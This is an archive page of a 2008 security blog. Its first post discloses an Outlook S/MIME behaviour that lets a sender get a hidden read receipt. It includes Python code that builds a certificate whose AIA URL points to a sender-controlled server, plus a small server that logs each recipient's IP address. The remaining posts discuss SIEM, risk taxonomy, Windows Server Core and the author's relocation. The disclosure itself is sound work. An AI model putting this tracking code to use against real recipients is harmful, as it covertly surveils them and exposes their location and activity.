Monday, June 30, 2008

Unauthorized reading confirmation on Outlook

Last month, during an exam item writing workshop for the CISSP-ISSAP certification, I got an idea about how a malicious e-mail sender could obtain a reading confirmation that is unseen by the recipient and includes the recipient's IP address. I was talking about S/MIME messages and thought about the signature validation process, where some of the steps may require external information (like a CRL) to be accessed. The interesting part is that the location of this information can be included in the message itself, since the PKCS#7 package can also include the certificate used to generate the signature.

I went into the Microsoft documentation about Outlook's validation process and found this (reference: http://technet.microsoft.com/en-us/library/bb457027.aspx#EKAA):

When the first certificate in the chain is validated, the following process takes place.

1. The chaining engine will attempt to find the certificate of the CA that issued the certificate being examined. The chaining engine will inspect the local system certificate stores to find the parent CA certificate. The local system stores include the CA store, the Root store, and the Enterprise Trust store. If the parent CA certificate is not found in the local system certificate stores, the parent CA certificate is downloaded from one of the URLs available in the inspected certificate's AIA extensions. The paths are built without signature validation at this time because the parent CA certificate is required to verify the signature on a certificate issued by the parent CA.

2. For all chains that end in a trusted root, all certificates in the chain are validated. This involves the following steps:

  • Verify that each certificate's signature is valid.
  • Verify that the current date and time fall within each certificate's validity period.
  • Verify that each certificate is not corrupt or malformed.

3. Each certificate in the certificate chain is checked for revocation status. The local cache is checked to see if a time-valid version of the issuing CA's base CRL is available in the cache. If the base CRL is not available in the local cache, or the version in the local cache has expired, the base CRL is downloaded from the URLs available in the CDP extension of the evaluated certificate. If available, it is confirmed that the certificate's serial number is not included in the CA's base CRL.

As described, the recipient's system will try to retrieve the CA certificate from a URL specified in the signer's certificate, which is embedded in the signed message. A specially crafted certificate can be generated with an AIA (Authority Information Access) extension containing a URL controlled by the malicious sender. By doing that, the sender will know immediately when the recipient reads the message in Outlook, even if the certificate is untrusted (so you don't need a certificate from a trusted CA to do this). I performed some tests that confirmed this scenario. Other e-mail clients, like Mozilla Thunderbird and Lotus Notes, did not present the same behavior. It seems that only Outlook implements this part of RFC 2459. It is behaving correctly, but I believe the user should have the ability to disable it.
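For illustration, here is a minimal sketch of how such a certificate could be generated. It uses Python's "cryptography" package (a modern library, chosen only for illustration, not what I used in my tests), and the subject name below is a placeholder; the only essential part is the AIA URL under the sender's control.

# A minimal sketch, not a drop-in exploit: builds a self-signed certificate
# whose AIA "CA Issuers" URL points at a server the sender controls.
import datetime
from cryptography import x509
from cryptography.x509.oid import NameOID, AuthorityInformationAccessOID
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa

key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "sender@example.com")])

# When Outlook builds the chain and cannot find the parent CA locally,
# it fetches this URL, revealing the recipient's IP and the read time.
aia = x509.AuthorityInformationAccess([
    x509.AccessDescription(
        AuthorityInformationAccessOID.CA_ISSUERS,
        x509.UniformResourceIdentifier("http://www.securitybalance.com/ca.html"),
    )
])

cert = (
    x509.CertificateBuilder()
    .subject_name(name)
    .issuer_name(name)  # self-signed: an untrusted certificate is enough
    .public_key(key.public_key())
    .serial_number(x509.random_serial_number())
    .not_valid_before(datetime.datetime.utcnow())
    .not_valid_after(datetime.datetime.utcnow() + datetime.timedelta(days=365))
    .add_extension(aia, critical=False)
    .sign(key, hashes.SHA256())
)
# "cert" and "key" would then be used to S/MIME-sign the outgoing message.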

Here is a sample of a web access from the recipient of a message crafted like that. In this case, the AIA address included in the certificate was pointing to the "http://www.securitybalance.com/ca.html" URI.

10.10.10.31 - - [12/May/2008:15:47:43 -0400] "GET /ca.html HTTP/1.1" 200 116 "-" "Microsoft-CryptoAPI/5.131.2600.3311"
(anonymized IP address)
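For completeness, here is a minimal sketch of the sender side. Any web server's access log, as shown above, already does the job; this hypothetical Python handler just makes the "read receipt" explicit (the /ca.html path and port 8080 are illustrative):

# A tiny collector: logs who fetched the AIA URL embedded in the certificate.
from datetime import datetime, timezone
from http.server import BaseHTTPRequestHandler, HTTPServer

class ReceiptHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == "/ca.html":
            # The request itself is the confirmation: it carries the
            # recipient's IP, a timestamp, and the CryptoAPI user agent.
            print(f"{datetime.now(timezone.utc).isoformat()} "
                  f"message opened from {self.client_address[0]} "
                  f"(UA: {self.headers.get('User-Agent')})")
        self.send_response(200)
        self.send_header("Content-Type", "application/pkix-cert")
        self.end_headers()
        # A real setup would return the CA certificate body here so that
        # chain building continues normally and nothing looks suspicious.

if __name__ == "__main__":
    HTTPServer(("", 8080), ReceiptHandler).serve_forever()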

Wednesday, June 25, 2008

SIEM dead, time for search?

This is what Raffy is saying: "Some of the problems I see with Security Information Management are (the first four are adapted from the Gartner IDS press release):

  • False positives in correlation rules

  • Burden on the IS organization by requiring full-time monitoring

  • A taxing incident-response process

  • An inability to monitor events at rates greater than 10,000 events per second

  • High cost of maintaining and building new adapters

  • Complexity of modeling environment
However, the biggest problem lies in the fixed event schema. SIMs were built for network-based attacks. They are good at dealing with firewall, IDS, and maybe vulnerability data. Their database schema is built for that. So are the correlation rules. Moving outside of that realm into application layer data and other types of logs can get hard. Fields don't match up anymore and the pre-built correlation rules don't fit either.

We need a new approach. We need an approach that can deal with all kinds of data. An approach that deals with multi-line messages, with any type of fields, even with entire files as entities. There is a need for a system that can collect data at rates of 100,000 events a second and still perform data analysis. It needs to support large quantities of analytical rules, not just a limited set. The system needs to be easy to use and absorb knowledge from the users. The solution is called IT search."

I really agree about the value of IT search, but I believe we have some confusion over the main objectives of each tool. If you are thinking about data mining and deeper analysis of log data, maybe searching really is a better approach. What I really question is using search for alerting purposes; I don't think search-based architectures for a "log analysis IDS" scale.

Raffy hits the point when he mentions that SIEMs target network-based devices. I have seen people working to integrate logs from different sources (applications) into those tools having a hard time with the vendors, who simply can't grasp the notion of using log data other than from routers, firewalls and IDSes.

Of course, logs from applications are not as simple as logs from network devices. Maybe that's why the vendors are avoiding them. They want to sell their products as plug-and-play boxes, and you can't have a plug-and-play installation when dealing with custom applications. What I believe is that an effective SIEM (or, if you don't want to define the technology behind it, a consolidated log monitoring) deployment is more similar to an ERP (or Identity Management) deployment than to an antivirus deployment. If vendors improved their products not by including more supported log formats but by delivering a fast and easy way to build log parsers (see the sketch at the end of this post), together with a flexible model for the entities that the tool and its rules can work with, it would be much easier to deploy them to provide better value and integrate more log sources.

The IAM tools evolved the same way. From the beginning they could work with LDAP, Active Directory, RACF and other famous identity repositories. The challenge for adopters, however, was not integrating with those repositories but with old legacy applications. The IAM products with the best "universal adapters" are the ones that generate the best results. I think it will be the same for SIEMs. All of them can work with CEE or something similar, but those with easy (and intelligent) tools to accept different sources will bring more benefit to their customers. Even search technology can be used to do that.

So don't blame the SIEM tools, blame their architects. When these people understand where the biggest value of those tools is, we will start to see huge benefits from them.
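To make the parser idea concrete, here is a minimal sketch (a hypothetical design in Python, not any vendor's API) of such a layer: new log sources are added by registering a pattern and a field mapping, and every parser emits a free-form set of fields instead of a fixed, network-centric schema.

# A hypothetical pluggable parser layer: each source registers a regex and
# a mapping function, and events are free-form dictionaries of fields.
import re
from typing import Callable, Dict, Optional

Parser = Callable[[re.Match], Dict[str, str]]
PARSERS: list[tuple[re.Pattern, Parser]] = []

def register(pattern: str):
    """Register a parser for log lines matching `pattern`."""
    compiled = re.compile(pattern)
    def wrap(fn: Parser) -> Parser:
        PARSERS.append((compiled, fn))
        return fn
    return wrap

@register(r'(?P<ip>\d+\.\d+\.\d+\.\d+) \S+ \S+ \[(?P<time>[^\]]+)\] '
          r'"(?P<method>\w+) (?P<path>\S+)')
def apache_access(m: re.Match) -> Dict[str, str]:
    # Each source emits whatever fields it has; no fixed schema is imposed.
    return {"source": "apache", **m.groupdict()}

def parse(line: str) -> Optional[Dict[str, str]]:
    for compiled, fn in PARSERS:
        m = compiled.search(line)
        if m:
            return fn(m)
    return None  # unmatched lines could still be indexed for raw search

print(parse('10.10.10.31 - - [12/May/2008:15:47:43 -0400] '
            '"GET /ca.html HTTP/1.1" 200 116'))

The point of the sketch is the extension model, not the regex: a customer integrating a legacy application would write only the last few lines for their own format, while correlation rules operate on whatever fields the events happen to carry.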

Wednesday, June 18, 2008

Open Group Risk Management "taxonomy"

I was reading this:

"With a goal of getting IT professionals to use standard terminology and eliminate ambiguity in expressing important risk-management concepts, the Open Group is finalizing a 50-page compendium of "risk-management and analysis taxonomy."

The Open Group Security Forum's risk taxonomy of about 100 expressions will not only address seemingly simple words such as threat, vulnerability and risk, but less common terms such as control strength."

I was wondering: why are these guys doing this when there are things like ISO Guide 73, ISO 27005 and ISO 27000 already published or on their way to publication?

This is why we asked so much for Server Core

This study from Jeff Jones's blog shows why the Server Core feature of Windows Server 2008 was so anticipated by security professionals. It points to roughly a 40% reduction in vulnerability numbers for a server running Windows if it had been using something like Server Core. My main concern now is whether software providers will enable their products to run on a Server Core installation. It would be a shame to have this feature and not be able to use it because some piece of software demands Solitaire to be installed in order to run :-)

Friday, June 13, 2008

I'm back

I'm back. OK, almost. Today I spent two hours reading lots of accumulated RSS news, blog posts and other things. I was glad to see that nothing very exciting happened during the last few weeks, while I was moving to Toronto and wasn't able to follow the news and post on the blog. Now my life is slowly settling into something we may call "routine", so I think it's time to resume the activities of this blog.

First, it seems that there is some good stuff from Mogull and Schneier. I'll read their posts as soon as possible to see if there is something I can add.

Today I went to Infosecurity Toronto. I was impressed by how small the exhibition was. Someone told me that the owners of the event did something weird on the marketing side, starting the negotiation of space and sponsorships too late. However, it was good to go there and take a quick look at the local security market. As always, conferences are those places where there are lots of vendors and not a single customer :-)

I'm still looking for a job here. I'm having good conversations with some pretty interesting companies, and I hope to be employed by the end of this month.

One interesting thing to mention here is that during my last week in Brazil I was hacked. Yes. I'm not ashamed to say that, especially because I'm aware that security professionals draw more attention from potential attackers. What happened was that I made two mistakes related to my personal password management "policy": I was reusing the same password across services I considered low-risk. The first mistake was treating three services that actually carry higher risk as "low risk" (in fact, I couldn't even remember I was using that password on them; it was something very automatic for me), and the second was using that password on a highly targeted and potentially insecure service. There is a small group of self-proclaimed "hackers" in Brazil trying to cause problems for the key names in Brazilian information security. Unfortunately, I am on that list. As I was caught in the middle of my relocation I was unable to follow many of the incident response procedures I would have liked to, but I'm aware that some of the others being targeted by this group are doing so. I won't talk much more about it, since it seems that what they really want is for people to talk about them. This, however, is a good reminder that as a security professional I need to be a little more paranoid about the security of my personal stuff.

That's all for now. I hope to be able to find more interesting stuff to write about again. I'm keeping my personal Portuguese-language blog updated with my impressions of my new city, but this one needs some special care too. I'll try harder.

Thursday, June 5, 2008

I didn't quit the blogging stuff

I know it has been ages since I last wrote here, but I'm finally putting together what I need here in Toronto, and I believe that in a few days I'll resume not only my blogging but also my Twitter presence. Don't unsubscribe, dear readers!